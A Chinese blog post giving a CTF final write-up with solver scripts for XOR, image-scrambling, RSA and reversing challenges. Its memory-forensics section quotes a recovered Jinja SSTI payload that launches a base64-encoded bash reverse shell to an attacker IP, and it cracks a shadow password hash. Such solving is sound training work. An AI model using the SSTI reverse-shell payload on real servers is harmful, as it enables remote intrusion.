内部赛-2022第二届网络安全攻防大赛团队赛-决赛WriteUp

已于 2024-07-24 11:37:28 修改
阅读量536 收藏 12
点赞数 17
文章标签: python
于 2024-07-24 11:31:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wgf42421/article/details/140658543
版权

Misc

Checkin

Cyberchef 自动解码。

sercetLab

是以前某次赛题。

流程大意为:输入正确的flag,取前13位,转为byte数组,与37异或,然后转回字符串,与串“CIDB^RiFeH@z”比较,得到一个布尔值 13位以后的字符,前后翻转,转为转为byte数组,减去0x0D,加上0x0A,再与37异或,转回字符串,与串“_zlySoyIT” (z后面有个不可见字符)比较,得到一个布尔值 两个布尔值做与非计算,输出结果给一个指示灯。 由此可知,flag的前13位计算后即为“CIDB^RiFeH@z”,后若干位计算后即为“_zlySoyIT” (z后面有个不可见字符) 接下来用两个字符串反向计算,编写脚本: xor=‘%’ str=‘CIDB^R`iFeH@z’ for i in range(len(str)):     print(chr(ord(str[i])^ord(xor[i%len(xor)])),end=“”) str1=“” xor=‘%’ str=‘_zlySoyIT’ for i in range(len(str)):     str1 += chr(ord(str[i])^ord(xor[i%len(xor)])) str2=“” for i in range(len(str1)):     str2 += chr(ord(str1[i])+3) for i in range(len(str2),0,-1):     print(str2[i-1],end=“”) 运行后得到flag{wELc@me_to_My_L@b}

LogisticFile

Logistic 置乱

试了 1-256 异或结果不对,使用大量的重复字符。进行轮异或。

字符。进行轮异或。

f = open('file', 'rb').read()

xor = 'x0=0.35,miu=3'
f1 = open(f'xorxor', 'wb')
for i, c in enumerate(f):
    x = ord(xor[i % len(xor)])
    f1.write(bytes([c ^ x]))
    f1.close()
    print('next')

直接拿提示脚本。运行。得到 flag.

import cv2
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image

def logic_encrypt(im, x0, mu):
    xsize, ysize = im.shape
    # print(xsize, ysize)
    im = np.array(im).flatten()
    num = len(im)
    
    for i in range(100):
        x0 = mu * x0 * (1-x0)
        
    E = np.zeros(num)
    E[0] = x0
    for i in range(0,num-1):
        E[i+1] = mu * E[i]* (1-E[i])
    E = np.round(E*255).astype(np.uint8)

    im = np.bitwise_xor(E,im)
    im = im.reshape(xsize,ysize,-1)
    im = np.squeeze(im)
    im = Image.fromarray(im)
    
    return im

img = cv2.imread('fff.jpeg',0)
img = logic_encrypt(img,0.35,3)
f = np.fft.fft2(img)
fshift = np.fft.fftshift(f)
s = np.log(np.abs(fshift))

plt.imshow(s,'gray')
plt.imsave("logic_encrypt.png",s)
plt.show()

XiaoMing’s Memory

考点:制作 profile 参考以下链接:
https://blog.bi0s.in/2021/08/20/Forensics/InCTFi21-TheBigScore/
Linux新版内核下内存取证分析附CTF题 https://mp.weixin.qq.com/s/dbHGBzjcMoF8aPqIkCN_Fg

使用 vol的 linux 相关命令提取信息,不要用windows提取命令.

恢复 /etc/shadow拿到用户hash为 1 1 1o2jjXFfH$VIk/lkh5/74iPQDvRodDT.
用hashcat跑一下rockyou.txt得到密码为 sunshine

在文件列表找到这个

0xffff9760b286d240                   1197979 /snap/home/john-doe/Documents/nohup.out
0xffff9760b25bc120                   1197763 /snap/home/john-doe/Documents/.log
0xffff9760b25bdad0                   1197758 /snap/home/john-doe/Documents/nonono.py

在nohup.out 找到反弹shell的访问IP及端口

192.168.199.131 - - [12/Sep/2021 05:55:49] "GET /?id={{''.__class__.__bases__[0].__subclasses__()[-1].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5OS4xMzEvODg4OCAwPiYx | base64 -d > /tmp/evilll").read()')}} HTTP/1.1" 200 -

192.168.199.131/8888

文件名是 nonono.py

同样可以在 netstat中进行确认

UDP	0.0.0.0	:44880 0.0.0.0	:	0	systemd-timesyn/703  
UDP	127.0.0.53	:   53 0.0.0.0	:	0	systemd-resolve/704  
UDP	0.0.0.0	: 5353 0.0.0.0	:	0	avahi-daemon/783  
UDP	::	: 5353 ::	:	0	avahi-daemon/783  
UDP	0.0.0.0	:49805 0.0.0.0	:	0	avahi-daemon/783  
UDP	::	:50863 ::	:	0	avahi-daemon/783  
TCP	::1	:  631 ::	:	0 LISTEN	cupsd/815  
TCP	127.0.0.1	:  631 0.0.0.0	:	0 LISTEN	cupsd/815  
TCP	0.0.0.0	: 8080 0.0.0.0	:	0 LISTEN	python3/3959 
TCP	192.168.199.133 : 8080 192.168.199.131 :55515 ESTABLISHED	python3/3959 			
TCP	192.168.199.133 :35488 192.168.199.131 : 8888 ESTABLISHED	bash/3989 			
UDP	0.0.0.0	:   68 0.0.0.0	:	0	dhclient/4102 
TCP	192.168.199.133 :51966 34.107.221.82   :   80 ESTABLISHED	MainThread/4166 			
TCP	192.168.199.133 :60610 52.88.96.248	:  443 ESTABLISHED	MainThread/4166

最后说是上网浏览。在目录里有firefox。 访问里录里有搜到 信息隐藏技术。
在firefox浏览记录里找到 https://www.kpaste.net/c4a5c ,标题是secret,那就是这个了。

[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]]+((![]+[])[+[]]+([][[]]+[])[+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+([][[]]+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+[+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]])[(![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]]((!![]+[])[+[]])[([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]](([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]]+![]+(![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]])()[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]])+[])[+!+[]])+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]])())

https://enkhee-osiris.github.io/Decoder-JSFuck/

function secretFunc() {   const secret = '6b57dcd6-460b-4eb3-9190-d99a03ef4685';   return true; }

md5(sunshine-192.168.199.131:8888-nonono.py-6b57dcd6-460b-4eb3-9190-d99a03ef4685)

Crypto

Simple

羊城杯 2020 原题

from sage.all import *
from Crypto.Util.number import *
from Crypto.Cipher import DES
import gmpy2
from Crypto.Util.number import *
from gmpy2 import invert

e1 = 1038188773022222237625162518466985515806685046439847462572843423800303080199415368325579099819361640945202226526678764311585592296933622966635366454130900252466567292666094830865094694540899938932650663694321540899409821558619513870070621174837528024755540950294728078653453000484865860920060355130142874882872471337494879275434166435493265146752291857135290428750750609423353579700984426964475724965353873095813181244686536072523222027403912142730610262067287620007571352094447066062529895627497159337248165671672168914514241613626520037706745398642583257608070477729851466078618962204332539106519787878047712382699
e2 = 2837849440271663829778449470456059993823700375016504578318494102782617180188657051885856137280051100635878402423110369686929227684421486015532180997159960436120141492683886715611434986294622600612428406093623932339780091710632795226634412256078611259843109876301975664056868908063144172636320692414857287719870275516722663234436495523740203192523105607062687910252368627072074836944313105637959564954309098651598325997792496430340003856687190484681832529188281328826421428597879086043647647886763379182416419551074016810300511817626177321217978912504879476086100668005286481779806010131350674761039391612993646202901
c = 5973798238952580291825915383143493132916118834759984908567429997405141389115327100612059752092101975323145558282778289524466024564450720131251849100687215493221989801105144437981685382023973692198113306045957788268110316519461230170693204752380105917975206409994893101671098451678847638671373239757408532363808224681853024689663345258120864348816343897379881239786554998688501997609152329902187048422237325117741778968505252184157273467466011959504548459297647302026380076579903441434135973514451254950835559924204821846949520738057940287763572642367638668413987340659205489659594044022422368411980101640782079189025
N = 26901814699902439156457451193693740730489294959491270367027927283506475930489639407729426818974347303153364758700002407059993182986763909124690390655890031474097185414651218374672254140022392199647526025638012909369532528422355530044873378287920255523382224453173638818751280227521077881224963029942704252587893395262633450759457753054490886171089835324182422639138198164026845488515879253564971977801724349440235209377091735281830263780308625603392942624306475075157394231585266792247387837984357822842056801420064918953837917678662504712605611080802179768683537742095990507008809197788025847612652983474906829809607

a = 0.356  # 731./2049
M1 = N ** 0.5
M2 = N ** (a + 1)
D = diagonal_matrix(ZZ, [N, M1, M2, 1])
M = matrix(ZZ, [[1, -N, 0, N ** 2], [0, e1, -e1, -e1 * N], [0, 0, e2, -e2 * N], [0, 0, 0, e1 * e2]]) * D
L = M.LLL()
t = vector(ZZ, L[0])
x = t * M ** (-1)
phi = int(x[1] / x[0] * e1)
d = invert(0x10001, phi)
m = pow(c, d, N)
print(long_to_bytes(m))

two old man

威尔逊定理加CRT

# -*- coding: utf-8 -*-
from Crypto.Util.number import long_to_bytes, isPrime
from gmpy2 import invert, powmod
from libnum import solve_crt
from functools import reduce

n = 85300075344029411815824595503988243445862905766678219075505308650733618833670564881852727486124268400610986787128098448019033364495139613324970241727110931819892696714818851281415775513570277910383275087114654129682377412912019832281317957560043184535419626656895668221654944747681971549122289940681069900407
c = 9573652589542765552302771253681350397003834739308979745013100413124314842798363931809688570564520116621700487372591176287735200842509675988724251662626729985842786542792501720096155870937426730816107184806453412679852267311433564241907769415712680798333238722253896962273334726781549003053182286964079196169
e = 65537
p = 9235803990126112015712488678718763955409551939176855113164196792808741000738495903574101715848666926223811357608313697206174389466866723210464201625526487
q = 9235803990126112015712488678718763955409551939176855113164196792808741000738495903574101715848666926223811357608313697206174389466866723210464201625528161

d = invert(e, (p-1)*(q-1))
assert p*q == n
m = pow(c, d, n)
d1 = invert(p-1, p)
print(f'd1 = {d1}')
m1 = m * d1 % p
print(f'm1 = {m1}')
s = reduce(lambda x,y: x * y % n, range(p, q), 1)
d2 = invert(s, q)
s = d2 * (q - 1) % q
d2 = invert(s, q)
print(f'd2 = {d2}')
m2 = m * d2 % q
print(f'm2 = {m2}')
m = solve_crt((m1, m2), (p, q))
print(long_to_bytes(m)[:-80])
b'flag{c7cfdbc1-729b-de11-239f-a473ec0637b8}'

Pwn

deadly

签到题,直接将环境地址填上,执行 cat flag

Reverse

obb

xxtea 解密和GKCTF2021 Somuchcode基本一致。

参考文章
https://blog.csdn.net/m0_51911432/article/details/123120168
https://tianyu.xin/index.php/rev/Somuchcode.html

  do
    ++v3;
  while ( *((_BYTE *)input + v3) ); // strlen
  sub_7FF656DE1420((unsigned int)(v3 >> 2), input, &key); // >>2 == // 4 , 4字节一组,下一行是比较 这边明显是加密了。

进入后在input交叉引用找到

  v71 = a2[a1 - 1]; 再交叉引用v71得到
...
  v347 = ((v301 >> 3) ^ (16 * v71)) + ((v71 >> 5) ^ (4 * v301));

